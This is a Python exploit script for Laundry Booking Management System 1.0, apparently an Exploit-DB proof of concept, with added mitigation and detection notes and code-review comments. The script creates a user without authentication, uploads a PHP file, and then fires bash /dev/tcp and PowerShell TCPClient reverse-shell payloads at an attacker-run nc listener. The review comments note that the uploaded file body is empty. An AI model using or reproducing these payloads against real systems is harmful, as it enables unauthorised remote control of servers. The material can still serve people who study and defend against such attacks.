# Exploit Title: Laundry Booking Management System 1.0 - Remote Code Execution (RCE)
# Date: 29/11/2021
# Exploit Author: Pablo Santiago
# Vendor Homepage: https://www.sourcecodester.com/php/14400/laundry-booking-management-system-php-source-code.html
# Software Link: https://www.sourcecodester.com/sites/default/files/download/oretnom23/laundry_sourcecode.zip
# Version: 1.0
# Tested on: Windows 7 and Ubuntu 21.10
# Vulnerability: Its possible create an user without being authenticated,
# in this request you can upload a simple webshell which will used to get a
# reverse shell
"""Proof of concept for an unauthenticated user-creation / file-upload flaw.

Root cause, as exercised by this script: ``pages/save_user.php`` accepts a
POST that carries no valid session (the ``PHPSESSID`` sent below is an
arbitrary string) and stores the multipart ``image`` field under the
web-served path ``uploadImage/Profile/`` using the client-supplied filename,
including a ``.php`` extension.

Mitigation notes for maintainers of the application:
- require an authenticated, authorised session on ``save_user.php`` (server
  side, not only in the UI);
- allow-list upload extensions and content types, and rename files on
  storage rather than trusting the client filename;
- store uploads outside the document root, or disable script execution in
  the upload directory.

Detection notes: POSTs to ``save_user.php`` from clients with no valid
session; new ``.php`` files appearing under ``uploadImage/Profile/``;
GET requests to that directory carrying a ``cmd`` query parameter; the web
server process spawning shells or opening outbound connections.
"""

# NOTE(review): re, sys and os are imported but never used in this file.
import re, sys, argparse, requests, time, os
import subprocess, pyfiglet

# Banner is printed at import time; there is no __main__ guard anywhere in
# this script, so importing the module also runs the exploit below.
ascii_banner = pyfiglet.figlet_format("Laundry")
print(ascii_banner)
print(" Booking Management System\n")
print("----[Broken Access Control to RCE]----\n")


class Exploit:
    """Holds the target URL, the upload filename and the listener address.

    ``target`` is the base URL of the vulnerable install (no trailing slash
    is added, so callers must not supply one); ``shell_name`` is the basename
    used for the uploaded ``.php`` file; ``localhost``/``localport`` are the
    listener address that the payload strings interpolate.
    """

    def __init__(self, target: str, shell_name: str, localhost: str, localport: str, os: str) -> None:
        # NOTE(review): the parameter named `os` shadows the `os` module inside
        # this method. Harmless here because the module is not used in the
        # body, but a trap for future edits.
        self.target=target
        self.shell_name=shell_name
        self.localhost=localhost
        self.localport=localport
        # Two renderings of host/port, one per payload syntax used in
        # execute_shell(): "host/port" for the bash variant and "'host',port"
        # for the PowerShell variant.
        self.LHL= '/'.join([localhost,localport])
        self.HPW= "'"+localhost+"'"+','+localport
        self.os=os
        self.session = requests.Session()
        #self.http_proxy = "http://127.0.0.1:8080"
        #self.https_proxy = "https://127.0.0.1:8080"
        #self.proxies = {"http" : self.http_proxy,
        #                "https" : self.https_proxy}
        # The cookie value is not a real session id. The request succeeds
        # only because save_user.php does not validate the session at all;
        # a correctly hardened endpoint would reject this request.
        self.headers= {'Cookie': 'PHPSESSID= Broken Access Control'}

    def create_user(self) -> None:
        """POST to save_user.php without authentication, attaching a .php file.

        Side effects on the target: a new account (``group_id`` 2) and a file
        named ``<shell_name>.php`` under ``uploadImage/Profile/``. The file
        body sent here is the empty string ``""``.
        """
        url = self.target+"/pages/save_user.php"
        data = {
            "fname":"bypass",
            "email":"bypass@bypass.com",
            "password":"password",
            "group_id": "2",
        }
        #Creates user "bypass" and upload a simple webshell without authentication
        request = self.session.post(url, data=data,headers=self.headers,files={"image":(self.shell_name +'.php',"")})
        time.sleep(3)
        # NOTE(review): HTTP 200 is a weak success signal; PHP applications
        # commonly return 200 for application-level failures too, so this
        # message only confirms the endpoint answered, not that the account
        # or file was actually created — verify on the target if it matters.
        if (request.status_code == 200):
            print('[*] The user and webshell were created\n')
        else:
            print('Something was wront...!')

    def execute_shell(self) -> None:
        """Start a local nc listener, then request the uploaded file with ``?cmd=``.

        The listener is spawned with Popen and never waited on or closed by
        this script. The GET carries no ``timeout=``, so with requests'
        default (no timeout) the call blocks rather than raising
        ReadTimeout; the except branch below therefore appears to be
        unreachable in practice — TODO confirm.
        """
        if self.os == "linux":
            time.sleep(3)
            print("[*] Starting reverse shell\n")
            subprocess.Popen(["nc","-nvlp", self.localport])
            time.sleep(3)
            #Use a payload in bash to get a reverse shell
            payload = 'bash+-c+"bash+-i+>%26+/dev/tcp/'+self.LHL+'+0>%261"'
            execute_command = self.target+'/uploadImage/Profile/'+self.shell_name+'.php?cmd='+payload
            try:
                request_rce = requests.get(execute_command)
                print(request_rce.text)
            except requests.exceptions.ReadTimeout:
                pass
        elif self.os == "windows":
            time.sleep(3)
            print("[*] Starting reverse shell\n")
            subprocess.Popen(["nc","-nvlp", self.localport])
            time.sleep(3)
            #Use a payload in powershell to get a reverse shell
            # NOTE(review): the literal ends in five quote characters, which
            # Python reads as the closing triple quote followed by an adjacent
            # empty string "" that is implicitly concatenated.
            payload = """powershell+-nop+-c+"$client+%3d+New-Object+System.Net.Sockets.TCPClient("""+self.HPW+""")%3b$stream+%3d+$client.GetStream()%3b[byte[]]$bytes+%3d+0..65535|%25{0}%3bwhile(($i+%3d+$stream.Read($bytes,+0,+$bytes.Length))+-ne+0) {%3b$data+%3d+(New-Object+-TypeName+System.Text.ASCIIEncoding).GetString($bytes,0,+$i)%3b$sendback+%3d+(iex+$data+2>%261+|+Out-String+)%3b$sendback2+%3d+$sendback+%2b+'PS+'+%2b+(pwd).Path+%2b+'>+'%3b$sendbyte+%3d+([text.encoding]%3a%3aASCII).GetBytes($sendback2)%3b$stream.Write($sendbyte,0,$sendbyte.Length)%3b$stream.Flush()}%3b$client.Close()"""""
            execute_command = self.target+'/uploadImage/Profile/'+self.shell_name+'.php?cmd='+payload
            try:
                request_rce = requests.get(execute_command)
                print(request_rce.text)
            except requests.exceptions.ReadTimeout:
                pass
        else:
            # Unreachable when invoked through get_args(), whose `choices`
            # already restricts --os to linux/windows.
            print('Windows or linux')


def get_args() -> argparse.Namespace:
    """Parse the command line; every option is required.

    Returns the argparse namespace with ``target``, ``shell_name``,
    ``localhost``, ``localport`` and ``os`` (restricted to linux/windows).
    """
    parser = argparse.ArgumentParser(description='Laundry Booking Management System')
    parser.add_argument('-t', '--target', dest="target", required=True, action='store', help='Target url')
    parser.add_argument('-s', '--shell_name', dest="shell_name", required=True, action='store', help='shell_name')
    parser.add_argument('-l', '--localhost', dest="localhost", required=True, action='store', help='local host')
    parser.add_argument('-p', '--localport', dest="localport", required=True, action='store', help='local port')
    parser.add_argument('-os', '--os', choices=['linux', 'windows'], dest="os", required=True, action='store', help='linux,windows')
    args = parser.parse_args()
    return args


# Module-level execution: runs unconditionally on import (no __main__ guard).
args = get_args()
target = args.target
shell_name = args.shell_name
localhost = args.localhost
localport = args.localport
xp = Exploit(target, shell_name,localhost,localport,args.os)
xp.create_user()
xp.execute_shell()
#Example software vulnerable installed in windows:python3 exploit.py -t http://IP/path -s rce -l 192.168.1.128 -p 443 -os windows
#Example software vulnerable installed in linux: python3 exploit.py -t http://IP/path -s rce -l 192.168.1.128 -p 443 -os linux